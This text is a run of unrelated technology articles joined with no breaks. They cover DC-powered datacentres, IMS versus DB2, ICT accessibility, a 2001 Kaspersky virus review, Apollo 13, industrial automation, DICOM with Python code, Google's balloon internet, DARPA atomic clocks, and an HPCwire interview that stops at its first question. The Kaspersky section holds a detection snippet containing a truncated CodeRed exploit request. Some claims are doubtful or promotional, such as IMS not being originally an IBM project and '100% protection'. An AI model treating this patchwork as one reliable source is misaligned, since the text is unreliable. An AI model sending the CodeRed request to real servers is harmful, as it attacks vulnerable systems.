"Alternating current (AC) power is used in virtually all UK datacentres, but DC power is almost 20% more efficient," said Jordan Gross, commercial director at Ultraspeed.
By using DC power, 20% to 40% of the thermal load is shifted outside the server to the AC-DC converters. This increases server reliability by as much as 27%, allows for higher density server environments and reduces power consumption.
According to Gross, many datacentres in London are facing power shortages, with modern servers drawing three times as much power as they did in the 1990s.
"We as an industry need to become more conscious of our power consumption and create sustainable datacentres. Reducing consumption directly is better than some unverifiable carbon offsetting scheme that is open to abuse," he said.
Switching to DC power enabled Ultraspeed to reduce its datacentre power consumption by 30%. The extra 10% saving was achieved by developing servers that run without a hard drive and use low energy processors.
"Discless servers generate less heat, and therefore less power is needed to cool them," said Gross. In an AC environment, for every 100W used to power a server, an additional 60W to 70W is needed for cooling.
Ultraspeed created its discless servers by putting the operating system and data on a remote storage area network. "This is not only more energy efficient, but has also brought hardware replacement times down to 15 minutes in the event of a failure," said Gross.
Makers of DC powered servers have reported power savings of up to 65% in datacentres using low power processors.
Analyst firm IDC said it believed using DC power in the datacentre could cut costs and improve the reliability of critical IT environments.
IMS stands for Information Management System. It is a hierarchical database management system that has been in use for a very long time, whereas DB2 is a relational database management system. To better understand the differences between IMS and DB2, you first need to know the different types of database management systems. There are a lot of differences between the two. IMS is used in many projects because of its versatility and robustness, and most widely because of a concept called checkpointing. Note that it's not only IMS DB that gets used in projects; a combination of DB (batch) and DC (online) is used in many shops.
Please have a look in some manuals/books for more info. You can also go through the IBM manuals below:
IMS/ESA V5 Appl Pgm: DB
IMS/ESA Version 4: Application Programming: Data Communication
I've worked with both. I LOVE IMS!!!! It is eons faster than DB2 and data recovery is basically automatic. Before there was IMS, a lot of shops used VSAM, which is almost like a sequential file, only with keys.
There was a lot of data redundancy. IMS was developed for the first moon project. It was not originally an IBM project. Long story short, IBM got into the picture and millions of people came online! YAY!
So if you think of it this way, IMS is the child of VSAM and DB2 is a close relative. I relate it like this: the root segment of an IMS hierarchical database is like the first normal form of a relational DB2 database, etc, etc. I still like IMS much better.
Now that the Olympics and the Paralympics are over, what have we learnt that is relevant to ICT accessibility?
The Paralympics proved to anyone who doubted it that although elite Paralympic athletes have disabilities, they are all able, capable, driven, passionate, and fun loving. In fact, no different to their Olympic counterparts. If we add to that the supreme intellect of Stephen Hawking, the grace of the disabled dancers during the opening ceremony, and the consummate musical skills of the paraorchestra during the closing ceremony, we must surely want to ensure that everyone with a disability is included as an equal member of our society. Finally, we saw the benefits of well-designed assistive technologies: Cheetah blades, wheelchairs for rugby or marathons, boccia slides and blind footballs on the sporting side, plus Hawking's voice and the special instruments in the paraorchestra.
So why is it that so many disabled people are not using ICT at all and so few are fully engaged?
The first problem is the perception of ICT suppliers and companies that use ICT to provide goods and services to their clients. There is still a perception that disabled people are incapable of and uninterested in using ICT, and therefore that there is no point in making it easy for them to use. Hopefully one of the legacies of the Paralympics is that people with disabilities will now be seen as capable and keen to do everything, and no barrier should be put in their way.
Second is a blindness to the number of people with disabilities, and therefore the size of the market opportunity. What the Paralympics has shown is the huge number of elite athletes, and that is only possible because there is a very much larger pool of people with disabilities. With estimates of 20% of the population having some form of disability, the business community must surely now understand the importance of including everyone as a potential client and working to turn the potential market into a business reality.
Hopefully the Paralympics will have raised the importance of inclusion with business leaders, and they will now be demanding accessibility in all parts of the business, especially ICT. This will put pressure on the ICT community, which is still not geared up to provide inclusive design of ICT products and services. To meet this extra demand I think there are two primary areas to consider: understanding and tools.
To quickly improve understanding of ICT accessibility at all levels of ICT from commissioning through design to delivery I would recommend two starting points:
- The BCS now provide an e-learning course Digital Accessibility: Web Essentials, which, in a couple of hours of training, will provide the basic understanding needed. It should be a standard part of training for anyone involved with ICT.
- 'BS 8878: 2010 Web accessibility code of practice' is the British standard that outlines a framework for web accessibility when designing or commissioning web products. This should be essential reading for any organisation creating a web presence.
The tools that are used to create ICT solutions do not make it easy to create accessible solutions. Tools for creating web sites, apps and content should all produce accessible output by default and give assistance to the designers and developers to ensure this happens. Tools at the moment vary from not providing any facilities to create accessible solutions through to those that make it possible; unfortunately very few make it easy to create accessible output by default. Hopefully pressure from business leaders and ICT users will ensure that tools improve quickly so that much of the complexity of providing accessible ICT is removed.
I hope that one of the legacies of the brilliant Paralympics will be that accessible ICT quickly becomes the norm, and that by Rio all ICT will be accessible.
Kaspersky Lab presents a year-end review of events taking place in anti-virus safety
2001 saw anti-virus companies achieve many definitive successes in the area of new anti-virus development, as well as the perfecting of already existing defense technologies thwarting malicious programs. In spite of these achievements, this year also witnessed the further increase in the number of users who suffered from virus attacks.
The rapid development of information technology (IT) has its pluses and minuses. On one hand, IT increases the effectiveness and efficiency of communication, developing documents, completing financial transactions, and in general has a very positive effect on conducting business. On the other hand, the continuing development of IT attracts even more new users, with the majority having only a superficial understanding of proper computer safety guidelines and rules. Because of this, even the most primitive malicious program can be enough to cause a global epidemic, such as with the "Kournikova" virus. These factors are the main reason for the worsening conditions in the anti-virus defense area.
Not one month passed in 2001 without the latest virus epidemic infecting computer systems in various countries. It is important to note that this is precipitated by virus writers actively creating new methods for virus penetration of computers, giving further rise to the number of virus incidents.
The following is a brief checklist of 2001 developments in the area of anti-virus safety:
- The widespread distribution of malicious programs exploiting breaches and holes in software safety systems;
- E-mail and the Internet solidified their positions as the most dangerous sources of malicious programs;
- The use of other popular alternative channels - ICQ, Gnutella, MSN Messenger, IRC - for the spreading of malicious programs;
- The increase in malicious programs for Linux;
- The appearance of "fileless" network worms;
- The predominance of Windows network worms, and the sharp decrease in script- and macro-viruses on the list of the most widespread malicious programs.
Safety System Errors
A breach is an error in an ordinary software program through which a malefactor is able to imperceptibly penetrate a computer with malicious code.
The danger inherent in this type of virus is that it is activated automatically, virtually independent of the user. For example, in order to be infected by Nimda, a user simply needs to open or read a message containing the worm in the preview pane. CodeRed doesn't even require this: it independently locates vulnerable computers via the Internet and infects them.
The main event of 2001 was the widespread distribution of malicious programs exploiting breaches and holes in an operating system's safety measures and applications for the purpose of penetrating computers (examples of such viruses are CodeRed, Nimda, BadtransII etc.).
According to Kaspersky Lab statistics, this type of malicious code has been responsible for 55% of the overall virus incidents occurring in 2001. This percentage speaks volumes for the necessity of adhering to the important anti-virus safety rules.
The particular attention paid by the computer underground to these breaches is perfectly understandable. While the traditional method of a virus penetrating a computer-when a user personally starts up an infected file-is just as effective as it previously was, it is not so efficient in achieving a malefactor's designs. This is because long ago, the majority of users realized the danger present in attached files. Therefore, many people simply prefer not to open such messages, asking a sender to instead send the information in the e-mail body. Taking this into consideration, virus writers have begun their search for new, more effective means of infecting computers, and they have found this new means in safety system vulnerabilities, i.e., breaches.
In order to guarantee yourself protection against such malicious programs, it is imperative to combine the use of Kaspersky Anti-Virus with the installation of the special software patches that close the well-known breaches. These patches are available free of charge directly from the developers of the vulnerable software, and can be found at the corresponding company's Web site.
Kaspersky Lab recommends paying particular attention to the patches for MS Windows, MS Outlook, and MS Internet Explorer, as they are the software most susceptible to virus attacks via the above-mentioned breaches. In order to receive an announcement about an available patch in a timely manner, a user can simply subscribe to the mailing list of the appropriate software developer.
E-mail and the Internet - The Main Virus-Threat Sources
In 2001, according to Kaspersky Lab data, the number of virus attacks via e-mail, compared to 2000, increased by 5%, reaching 90% of overall virus-related incidents.
In conjunction with this, there has been a noticeable increase in the number of computers infected via the Internet. Whereas before the majority of infections were a direct result of a user downloading an unscanned file from a Web site and starting it up on his/her computer, today, more and more incidents of infection occur during an intended or accidental visit to an infected site. This occurs when a malicious program overrides one of the victim-site's pages so that when a user browses this page, his/her computer can be infected in two cases: The first occurs when a malefactor exploits a breach in the Web browser's safety system - most often on Internet Explorer (these breaches allow for a computer to be imperceptibly infected the moment a compromised page is viewed). The second case occurs automatically when a user downloads a proposed page containing malicious code.
In 2001, it also became clear that many popular Internet messaging systems (ICQ, Instant Messenger) contain vulnerabilities that can be used for the spreading of a whole string of malicious programs. For example, Gnutella, the information-exchange network, fell victim to the network worm Mandragore, and a very large number of worms have been programmed to spread via IRC.
Today's trend allows for the assessment that e-mail and the Internet will remain the most popular means for virus spreading. We must once again emphasize the importance of installing a reliable anti-virus defense for thwarting virus attacks via these sources.
Attacks on Linux Continue
2001 also saw the appearance of even more malicious programs targeted at the Linux operating system. The first sign of this was the Ramen network worm that was detected on January 19, and since that time, has struck a large number of corporate systems. Among the list of those falling victim to the Ramen worm were NASA, Texas A&M University, and Supermicro, a Taiwanese computer equipment producer.
Following this, the infection rate took on a flash-flood effect: Ramen clones appeared along with other original Linux worms, causing a similar amount of virus incidents.
Virtually all malicious programs for Linux exploit breaches in this operating system, and the widespread nature of these viruses demonstrates Linux's inability to withstand current and new threats. Considering Linux to be impenetrable, users have not taken seriously the necessity of installing Linux patches and an anti-virus in general. As a result, many users have fallen victim to Linux worms.
The Linux situation would be even graver if the operating system were used not only on specialized servers but also as a workstation platform. In that case, the number of Linux users would increase many times over, attracting the interest of an ever-increasing number of virus writers creating malicious code for Linux.
You can read more about the Kaspersky Lab research into the problem of protecting Linux from viruses at this site.
"Fileless" Worms - The Next Call to Arms for the Anti-Virus Industry
One of 2001's most unpleasant surprises came in the form of detecting a new type of malicious code (CodeRed and BlueCode) able to actively spread and function on an infected computer without the use of a file. While in operation, such programs are present in the system memory only, and upon transfer to other computers, the programs are in the form of special data packets.
This peculiarity created serious problems for anti-virus developers, because traditional technology (anti-virus scanners and monitors) is incapable of effectively withstanding such a new threat. The standard defense algorithms thwarting malicious code are based on intercepting file operations. Kaspersky Lab was the first to remedy this problem by creating a special anti-virus filter that, in the background, checks all incoming data packets and deletes "fileless" worms.
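As a rough illustration of the idea (a simplified stand-in, not Kaspersky's actual filter), detecting a "fileless" worm means matching signatures in reassembled network payloads rather than in file operations. CodeRed, for example, arrived as a single HTTP request exploiting the IIS .ida buffer overflow, so its tell-tale byte pattern only ever appears on the wire and in memory:

```python
# Rough illustration only -- a simplified stand-in, not Kaspersky's
# actual filter. A "fileless" worm never touches disk, so detection
# must scan reassembled network payloads instead of intercepting
# file operations.
#
# CodeRed spread as one HTTP GET exploiting the IIS .ida buffer
# overflow; the request began with a long filler run (reproduced
# here in truncated form).
CODERED_SIGNATURE = b"GET /default.ida?" + b"N" * 16

def payload_is_infected(payload: bytes) -> bool:
    """Return True if a known fileless-worm signature is in the payload."""
    return CODERED_SIGNATURE in payload

# A filter would run this check on every inbound payload and drop
# matching connections before the exploit ever reaches the web server.
sample = b"GET /default.ida?" + b"N" * 224 + b"%u9090..."
print(payload_is_infected(sample))  # True
```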
The global epidemic caused by CodeRed (which according to some estimates has infected over 300,000 computers) confirmed the effectiveness of the "fileless" technology. It is important to note that even now, most computers have inadequate defense measures against this type of malicious code. Taking this into consideration, Kaspersky Lab believes next year will witness a repeat epidemic caused by new versions of "fileless" worms.
Windows Worms Make Their Entrance
In 2001, there was a sharp change in the make-up of the most widespread malicious programs. In 1999-2000, the unquestionable leaders among all viruses were macro-viruses and, a bit later, script-viruses and worms. However, at the beginning of this year the situation began to change drastically, and already nearly 90% of registered cases of computer infection have been caused by Windows worms.
The reason behind such an about-face change is witnessed in the development of an effective means for battling macro- and script-viruses, found in the ability of an anti-virus to neutralize both existing and potential threats of this type. For example, the first background checker in the world that intercepts script-viruses, Script Checker, was integrated into Kaspersky Anti-Virus in May 2000. Script Checker repelled all attacks of the various forms of the LoveLetter (ILOVEYOU) virus without any additional updates to the anti-virus database. This impressive result was achieved thanks to the unique heuristic technology created specifically for defending against unknown script-viruses.
For the fight against macro-viruses, Kaspersky Lab developed Office Guard, which provides 100% protection against these types of viruses. Unlike traditional anti-viruses, Office Guard does not search for virus signatures; instead, it emulates and analyzes macro behavior, blocking any harm a macro-virus could cause to a computer.
Government Control Over the Anti-Virus Industry?
In November, it became known that the FBI had developed a Trojan program for the tracking of suspects. This "classic" Trojan, christened Magic Lantern, intercepts all keystrokes a suspect makes, copying them to a secret file. Later, the received data can be used to decode and decrypt sent e-mail and provide evidence against said suspect or suspects.
On December 3, Paul Bresson, spokesman for the FBI, during an interview with the magazine Information Security, confirmed the development of the Magic Lantern Trojan. However, at the behest of the US government (or at least the strong "suggestion"), will anti-virus developers not include means for detecting such a Trojan in their software? McAfee and Symantec have already confirmed that they won't include detection measures for Magic Lantern - is this the beginning of a user exodus to other anti-virus products?
This type of move by the US government could be precedent setting. Theoretically, should this happen, other countries' governments could make similar demands of other anti-virus companies to not include means for detecting similar governmental spying Trojans. In this case, anti-virus security could completely get out of control. And sooner or later, as always happens, the original Magic Lantern could fall into the hands of malefactors, whose goal would be to use this program for their own ends. As a result, the world economy, heavily dependent on IT, could be paralyzed by a worldwide virus epidemic.
The Future Safety of the Worldwide Net
The worsening condition of the virus situation gives rise to pessimistic predictions in relation to Internet development. According to the England-based company MessageLabs, should the present tendency continue, by 2013, every second e-mail could contain malicious code.
There is the opinion that in order to get out of this difficult bind, a safe, parallel Internet must be created. This means of solving the problem could be complicated by the majority of users being unwilling to switch over to the new Net, and also by the possibility of malicious code "migrating" from the current Internet. According to Kaspersky Lab, the best solution is to introduce, step by step, new equipment and software into the current Internet technology, using only checked and certified information and data. Together with this, the most important aspect would be the issuing of a personal identification number to each user on the Net. This would help keep track of and stave off virus epidemics, and also help localize the creators of malicious programs and stop their actions.
Current trends allow for predicting the situation in virus development as it may occur in 2002. Unfortunately, there isn't any basis for absolute optimism. Kaspersky Lab believes that there will be an increase in the number and variety of virus epidemics in the coming year. First and foremost, this is dependent on the number of users, some of whom will be virus writers, and the others, their victims. The amount of malicious programs, varying in type, will also grow; and undoubtedly, their methods of penetrating computers will be improved.
In connection with this, Kaspersky Lab will continue developing the very latest defense technology that will reliably protect and defend computers and the Net from the rising virus-threat tide. For 2002, Kaspersky Lab plans to release new virus technologies that will make our users even more secure. A more than 150% increase in the number of Kaspersky Anti-Virus users in 2001 confirms our anti-virus' high quality and our commitment to overall customer service.
In conclusion, we present the Top Ten most widespread viruses, by percentage of occurrence, for the last quarter (Sept.-Dec.) of 2001.
This is about Apollo 13, a mission that is considered the most successful failure in the history of NASA: a failure because it could not achieve the mission it was designed for, and a success because of the most remarkable achievement of bringing the three astronauts back home safely. Hollywood made a popular movie, Apollo 13, and I strongly recommend people watch it, as it clearly depicts the Apollo 13 accident.
En route to the moon, approximately two hundred thousand miles from Earth, an oxygen tank in the service module of Apollo 13 exploded, and that sealed the failure of the mission. The original mission was aborted, and a new mission, "bring the astronauts safely home," replaced it. The entire world witnessed a series of dramatic events during this new mission. I would like to cite the two most critical problem solutions in this drama and provide a process perspective.
The first life-threatening problem was the increasing level of carbon dioxide in the cabin of the lunar module. The control room in Houston did a commendable job of designing the solution, but its implementation had to be done by the astronauts themselves. The control room delivered the lifesaving process: exact, step-by-step procedures that the astronauts could execute. All the astronauts did was execute those step-by-step procedures, and they saved their lives. The desired outcome was achieved through the procedural task execution designed by the solution designer.
The drama continued with a second life-threatening situation around re-entry into the Earth's atmosphere. Because of an acute power shortage, the originally designed re-entry procedure was unworkable. The captain of the mission, Jim Lovell, repeatedly emphasized the need for "step by step" procedures. This was yet another commendable delivery by the control room in Houston. In a very timely manner, meeting the deadlines, the control room delivered step-by-step procedures to be executed by the astronauts on board, and saved their lives again.
What is the takeaway?
We learn about the might of a well-designed process and procedure, especially when dealing with complex systems. We also learn about the positive outcome that it brings in all aspects of life. In our regular business too (of enabling mainstream business through IT systems), well-designed processes can deal with every possible business-critical situation. This is the fundamental principle of the service management philosophy.
Imagine digital factories that leverage sophisticated communications and control capabilities to give machines real-time, autonomous decision-making power. Imagine the cost-effective assembly of customized products that such a digital production system enables. And consider how that system might scale across a much wider network, sharing best practices in manufacturing automation to drive broader operational and financial performance improvements. It is not all fantasy…
Sensors and control mechanisms are now embedded into most Automotive and Industrial Equipment industry shop-floor machinery. What’s more, such devices are increasingly connected with management, execution, logistics and ERP systems. As a result, manufacturers have unprecedented visibility into the factory production process.
However realizing the full potential of Industrial Automation poses challenges for many companies. It requires new tools, new skills, new ways of sharing and managing information—and new ways of thinking. That’s a big ask for companies that are not digital “natives”. And an even bigger one for those that are not organized operationally to network across the ecosystem.
Intelligent tools and an intelligent workforce are key enablers of Industrial Automation and together they permit deeper analysis of both manufacturing processes and the supply chain.
Intelligent tools such as sensors, materials tracking mechanisms, 3D printing, automated product design, robotics, mobile devices and "wearables" can all help manufacturers cut costs and increase productivity. Networked equipment sensors, for example, can identify and predict maintenance issues and thus help reduce unscheduled downtime. Moreover, 3D printing can boost product quality and help reduce the need for a spare parts inventory.
Intelligent tools require an intelligent workforce, and vice versa. As men and machines do more together, new technologies can deliver the skills needed to make the most of Industrial Automation, helping boost both the skill sets and collaborative capabilities of the human element in a more change-ready and responsive workforce. For example, smart glasses can display all the information an operator requires to do the job faster and with fewer errors. Eyewear technology can also offer interactivity by granting professionals access to features including barcode scanning, data retrieval from the cloud, voice command and augmented reality. However, even in an increasingly machine-centric environment, people will still predominate as the drivers of change, using these tools to achieve the best and most efficient outcomes for companies. To facilitate this digital journey, however, they need new skills: from data science to machine coordination and maintenance.
In summary, Industrial Automation offers manufacturers the chance to build faster processes, better products, improved asset efficiency, and higher workforce productivity. The time to start realizing its potential is now.
What Is DICOM?
DICOM is a Standard for Digital Imaging and Communications in Medicine. The DICOM Standard specifies a diverse set of information about patients, imaging equipment, procedures, and images. DICOM is hierarchically structured and has a Client-Server architecture. It has the following parts:
- File/data format
- Data interchange protocol
- Network protocol architecture
Basic Knowledge About the DICOM Protocol
At its simplest, DICOM is a protocol for dealing with medical images (X-rays, MRIs, etc.). If you're diving into DICOM, there are a few things you should know right from the start that will make your life a lot easier. I'll outline some of these basic facts here, then dig deeper later on in the post:
- DICOM files typically have a .dcm extension, and the data contains both patient data and the image/pixel data. The patient data comes from the EMR/EHR/HIS systems as HL7 data, which gets tightly coupled with the equipment, procedure and image/pixel data created by the radiology medical imaging devices as DICOM data (see the file-reading sketch just after this list).
- The DICOM protocol is a binary Upper Layer Protocol (ULP) over TCP/IP. Well-known ports used by DICOM are 104, 2761, 2762 and 11112. It is used to process, transmit, search/query, integrate, distribute, print, share, store and display medical images and patient data, moving them from the radiology archival/storage systems (PACS, RIS) to the workstation where the Radiologist writes reports.
- The DICOM Network Protocol architecture looks something like this: Network ⇒ TCP/IP ⇒ DICOM ULP for TCP/IP ⇒ UL Service boundary ⇒ DICOM Message Exchange ⇒ Medical Imaging Application.
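To make the file side of this concrete, here is a minimal sketch using the open-source pydicom library (not an ExtraHop tool); the file name is a placeholder, and the attributes shown assume a typical image object:

```python
# Minimal sketch of reading a .dcm file with the open-source pydicom
# library (pip install pydicom). "study.dcm" is a placeholder name.
import pydicom

ds = pydicom.dcmread("study.dcm")

# Patient data that originated in the EMR/EHR/HIS systems as HL7
# travels inside the same file as the image.
print(ds.PatientName, ds.PatientID)
print(ds.Modality)            # e.g. "CT", "MR", "CR"
print(ds.AccessionNumber)     # links the study back to the RIS order

# Image/pixel data produced by the imaging device (requires NumPy).
pixels = ds.pixel_array
print(pixels.shape, pixels.dtype)
```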
Why Does DICOM Matter?
Medical imaging is the fastest growing and most profitable segment of healthcare. DICOM has an ever increasing need for network bandwidth, system performance and support for many diverse medical devices.
Currently there are limited tools available to diagnose patient data, DICOM and network protocol problems. ExtraHop can help!
How Can ExtraHop Help with DICOM Monitoring?
DICOM, HL7 data and the network are crucial to the healthcare industry. As of version 5.2.2, ExtraHop has added support for DICOM; ExtraHop already had support for HL7 and many of the relevant network protocols in previous versions.
ExtraHop has the huge advantage of being able to extract meaningful insights from HL7 (i.e., patient data), DICOM and other network messages in real time!
Now we get to explore many aspects of DICOM workflows and monitor DICOM. We want to see how we can help the different departments in healthcare like radiology, IT, support etc. in pinpointing the underlying problems with DICOM from multiple angles.
The History of DICOM
DICOM is a standard developed by the American College of Radiology (ACR) and the National Electrical Manufacturers Association (NEMA). It started in the 1980s, and in 1988 the second version was released. The first large-scale deployment of ACR/NEMA technology was made in 1992 by the US Army and Air Force. Loral Aerospace and Siemens Medical Systems led a consortium of companies in deploying the first US military PACS (Picture Archiving and Communications System). In 1993 the third version of the standard was released, and its name was changed to "DICOM." New service classes were defined, network support was added, and the Conformance Statement was introduced to establish the basic DICOM communication protocols for query/retrieve, storage and print classes. Officially, the latest version of the standard is still 3.0, but it has been constantly updated and extended since 1993.
Where and How Is DICOM Used?
DICOM is used extensively for medical imaging in hospitals. It is used in the processes of diagnosing and treating patients, tracking patient outcomes, scheduling procedures, ICD-10 coding, billing, and teleradiology, which transmits radiological patient images such as X-rays, CTs and MRIs (the different modalities) from one location to another for the purpose of sharing studies with other radiologists and physicians.
An examination number is generated prior to imaging when the order is created to synchronize image transfer to PACS using PACS ID and/or RIS using an accession number which links the radiology reports to a specific image study. The accession number is usually assigned by the HIS/RIS system and can be repeating or unique depending on the system.
Managing the modality worklist is a process used to reduce manual data entry errors and increase fidelity of patient information into the PACS/RIS imaging console.
Basic Structures and Concepts in DICOM
- DICOM Objects are known as the Information Object Definitions (IOD). All real world data like patients, studies, medical devices, images, patient schedule list, a queue to be sent to a printer are objects with defined templates. These are definitions of the information to be exchanged between a Service Class User (SCU) - Client and Service Class Provider (SCP) - Server.
- A DICOM modality is a property/attribute of the DICOM data object, e.g. CT, MRI, X-rays etc. are the modalities
- A DICOM Message is composed of a Command Set followed by a conditional Data Set.
- Command and Data sets are made of Elements.
- Elements have a Tag, length and value.
- Tags have group tag and element tag.
- DICOM applications provide the services required for the data exchange.
- DICOM Service Element (DIMSE) are used by Application Entities (AE).
- There are two types of DIMSE Services, Composite DIMSE-C and Normalized DIMSE-N. These support operations and notifications like storage, retrieval, printing etc. on the SOP instances.
- AEs have Titles (AETs), and each AE has an IP address assigned. AETs are case sensitive and unique.
- Service Object Pairs (SOPs) have an unique ID (UID). SOP Classes are the fundamental unit of DICOM interoperability.
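The hand-rolled sketch below shows the Tag/length/value structure of elements directly. It assumes an explicit-VR little-endian file and ignores many real-world cases (implicit VR, sequences, undefined lengths), so treat it as illustrative only; a library like pydicom handles all of this in practice.

```python
# Illustrative sketch: print (group, element, VR, length) for the first
# few data elements of an explicit-VR little-endian DICOM file.
# Real parsing has many more cases -- use pydicom in practice.
import struct

def walk_elements(path, max_elements=10):
    with open(path, "rb") as f:
        f.seek(128)                      # skip the 128-byte preamble
        if f.read(4) != b"DICM":         # DICOM magic marker
            raise ValueError("not a DICOM Part-10 file")
        for _ in range(max_elements):
            header = f.read(8)
            if len(header) < 8:
                break                    # end of file
            group, element, vr = struct.unpack("<HH2s", header[:6])
            vr = vr.decode("ascii", errors="replace")
            if vr in ("OB", "OW", "OF", "SQ", "UT", "UN"):
                # Long-form VRs: 2 reserved bytes, then a 4-byte length.
                length = struct.unpack("<I", f.read(4))[0]
            else:
                # Short-form VRs: the last 2 header bytes are the length.
                length = struct.unpack("<H", header[6:8])[0]
            f.seek(length, 1)            # skip over the value bytes
            print(f"({group:04X},{element:04X}) VR={vr} length={length}")

walk_elements("study.dcm")               # placeholder path
```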
How does the DICOM transaction happen?
- The AE of the SCU (client) uses DIMSE services to negotiate a SOP Class with the AE of the SCP (server). DIMSE protocols define the procedures and encoding rules used to construct messages. (A minimal association sketch follows this list.)
- Message transactions between the two devices using DICOM begin with an Association establishment. Both devices negotiate the information structures that will be exchanged, the services that will be invoked, byte order and data compression method.
- DICOM ULP consists of seven Protocol Data Units (PDUs). Each PDU has a maximum length. PDUs are the message formats exchanged between peer entities within a layer, based on the request and the response DICOM messages.
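As a sketch of that association handshake, here is a minimal DICOM "ping" (a C-ECHO against the Verification SOP Class) using the open-source pynetdicom library; the host, port, and AE titles are placeholders for a real PACS:

```python
# Minimal association + C-ECHO ("DICOM ping") sketch using the
# open-source pynetdicom library (pip install pynetdicom).
# Host, port, and AE titles below are placeholders for a real PACS.
from pynetdicom import AE

ae = AE(ae_title="MY_SCU")
# Propose the Verification SOP Class (UID 1.2.840.10008.1.1) during
# association negotiation.
ae.add_requested_context("1.2.840.10008.1.1")

assoc = ae.associate("pacs.example.org", 11112, ae_title="PACS_SCP")
if assoc.is_established:
    status = assoc.send_c_echo()         # DIMSE-C echo request
    print(f"C-ECHO response status: 0x{status.Status:04X}")
    assoc.release()                      # orderly association release
else:
    print("Association rejected, aborted, or never connected")
```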
What Is Next for DICOM?
DICOM is a very complex protocol, with a lot of documents written by NEMA defining the DICOM standard. ExtraHop has recently added support for DICOM in version 5.2.2, which opens up many different possibilities.
I am very excited about it, since DICOM gives us one more piece of the complex healthcare workflows, offering deep insight into healthcare data and network issues.
Currently we are in an exploratory mode to figure out even more meaningful insights we can get from DICOM data using ExtraHop. The possibilities are endless, especially since we can correlate DICOM data with HL7 data and network protocols for a complete picture of this crucial, profitable part of the healthcare technology environment.
Stay tuned for more blogs on DICOM in the future. For now, check out Six Ways ExtraHop Enables Real-Time Healthcare Systems.
Google launched high-altitude balloons in a test to create a wireless network that could provide Internet access to remote and underserved parts of the world.
For two out of three people around the world, a fast and affordable Internet connection is out of reach. Google is trying to solve this problem with a network of balloons that fly above the Earth twice as high as commercial airplanes.
Google X, the company's research arm, is testing balloon-powered Internet access. Last week, Google launched 30 high-altitude balloons above the Canterbury area of New Zealand as part of a pilot test with 50 users trying to connect to the Internet via the balloons.
Members of the Google X team explain how they create a wireless network using high altitude balloons that fly in the stratosphere, about 12.4 miles above Earth.
"There are many terrestrial challenges to Internet connectivity -- jungles, archipelagos, mountains," wrote Mike Cassidy, Google's project lead for the balloon effort, in a blog post. "There are also major cost challenges. Right now, for example, in most of the countries in the southern hemisphere, the cost of an Internet connection is more than a month's income. Solving these problems isn't simply a question of time: It requires looking at the problem of access from new angles."
Google's vision is to build a ring of balloons, flying around the globe on stratospheric winds about 12.4 miles high, that provide Internet access to remote and underserved areas. The balloons communicate with specially designed antennas on the ground, which in turn, connect to ground stations that connect to the local Internet service provider, the company said.
"It's very early days, but we've built a system that uses balloons, carried by the wind at altitudes twice as high as commercial planes, to beam Internet access to the ground at speeds similar to today's 3G networks or faster," Cassidy wrote. "As a result, we hope balloons could become an option for connecting rural, remote, and underserved areas, and for helping with communications after natural disasters."
He added that people at Google X have dubbed the effort Project Loon, simply because the idea sounds a bit crazy. However, he said there's "solid science" behind it.
Ezra Gottheil, an analyst with Technology Business Research, said he's intrigued with the idea.
"It's a good thing we've got Google to do crazy things," he added. "Internet access is really important, and will be more important going forward. And many things that eventually were significant started out as crazy prototypes. So I'm all for it."
One issue that Google has had to deal with is how to keep the balloons floating roughly in the same area to maintain an Internet connection on Earth. Cassidy said the team members believe they've figured it out.
"All we had to do was figure out how to control their path through the sky," he noted. "We've now found a way to do that, using just wind and solar power: We can move the balloons up or down to catch the winds we want them to travel in. That solution then led us to a new problem: How to manage a fleet of balloons sailing around the world so that each balloon is in the area you want it right when you need it. We're solving this with some complex algorithms and lots of computing power."
Google wants to expand the pilot test and try the balloon effort in other countries going forward. Project leaders also hope to connect with others who have been working to solve Internet connectivity issues to trade ideas and possibly work together.
"This is still highly experimental technology and we have a long way to go," Cassidy wrote. "We'd love your support as we keep trying and keep flying!"
The US military is looking for advanced portable atomic clocks it says will help bolster secure data routing, build communication systems that are insensitive to jamming and provide more reliable and robust global positioning than current time-keeping systems.
The portable atomic clock research is part of the Defense Advanced Research Projects Agency's Quantum Assisted Sensing and Readout (QuASAR) program, which seeks to develop techniques to miniaturize and ruggedize high-performance atomic clocks for deployment in the field.
According to DARPA, many defense-critical applications require exceptionally precise time and frequency standards enabled only by atomic clocks. The Global Positioning System (GPS) and the internet are two key examples. Atomic properties are absolute, and do not "drift" or lose minutes over time. In this sense, atoms are self-calibrated, making them ideal for precision sensing, DARPA stated.
Recent years have seen the emergence of advanced technologies that exhibit single-atom-like properties, such as nanoelectromechanical systems (NEMS) and nitrogen-vacancy (NV) centers in diamond that retain their characteristics even at room temperature, DARPA stated.
The application of atomic control and cooling methods to these solid-state systems will yield a new generation of sensors of extreme resolution and sensitivity, DARPA stated. By employing these new techniques used in current laboratory atomic clocks, military clocks can be improved by orders of magnitude. Such clocks will enable secure data routing, communication systems that are insensitive to jamming, high-resolution coherent radar, and more reliable and robust global positioning, DARPA stated.
Under QuASAR, DARPA wants to see ways to reduce the total footprint of atomic clocks to portable sizes while maintaining high performance. Specifically, DARPA wants contractors to:
- Demonstrate the high-risk components necessary to produce a fieldable clock. Effort need not be spent on integrated electronics and packaging of the device.
- Integrate components and perform a proof-of-principle tabletop experiment achieving 10⁻¹⁶ fractional frequency stability at 1 day (roughly 10 picoseconds of accumulated timing error over that day).
- Provide a credible plan for a high-performance fieldable device based on program components and table top experiments.
Despite all the recent hoopla about GPGPUs and eight-core CPUs, proponents of reconfigurable computing continue to sing the praises of FPGA-based HPC. The main advantage of reconfigurable computing, or RC for short, is that programmers are able to change the circuitry of the chip on the fly. Thus, in theory, the hardware can be matched to the software, rather than the other way around. While there are a handful of commercial offerings from companies such as Convey Computer, XtremeData, GiDel, Mitrionics, and Impulse Accelerated Technologies, RC is still an area of active research.
In the U.S., the NSF Center for High-Performance Reconfigurable Computing (CHREC, pronounced “shreck”), acts as the research hub for RC, bringing together more than 30 organizations in this field. CHREC is run by Dr. Alan George, who gave an address at the SC09 Workshop on High-Performance Reconfigurable Computing Technology and Applications (HPRCTA’09) on November 15. We got the opportunity to ask Dr. George about the work going on at the Center and what he thinks RC technology can offer to high performance computing users.
HPCwire: FPGA-based reconfigurable computing has captured some loyal followers in the HPC community. What are the advantages of FPGAs for high-performance computing compared to fixed-logic architectures such as CPUs, GPUs, the Cell processor?
